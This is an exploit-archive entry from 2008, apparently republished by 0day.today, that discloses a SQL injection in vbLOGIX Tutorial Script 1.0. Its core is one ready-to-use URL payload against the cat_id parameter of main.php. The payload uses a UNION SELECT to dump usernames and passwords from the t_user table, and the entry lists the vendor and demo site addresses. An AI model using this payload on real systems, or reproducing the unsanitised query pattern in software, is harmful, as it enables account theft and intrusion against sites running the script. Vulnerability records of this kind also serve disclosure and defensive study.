id: 3659
date: 09/11/2008
title: vbLOGIX Tutorial Script <= 1.0 (cat_id) SQL Injection Vulnerability
author: FIREH4CK3R
cves: 

===================================================================
vbLOGIX Tutorial Script <= 1.0 (cat_id) SQL Injection Vulnerability
===================================================================


#=====================================================================================================
#vbLOGIX Tutorial Script <= v1.0 (cat_id) Remote SQL Injection Exploit
#=====================================================================================================
#
#
#Venedor site : http://www.vblogix.com/
#
#Demo site: http://www.vb-demo.com/
#
#Version : v1.0
#
#=====================================================================================================
#
#DORK : no have
#
#
#Exploit :
#--------------------------------
# main.php?act=list&cat_id=-1+UNION+ALL+SELECT+concat(usrname,0x3a,psswd)+FROM+t_user/*
#
#=====================================================================================================
#Discoverd By : FIREH4CK3R



#  0day.today [2023-03-25]  #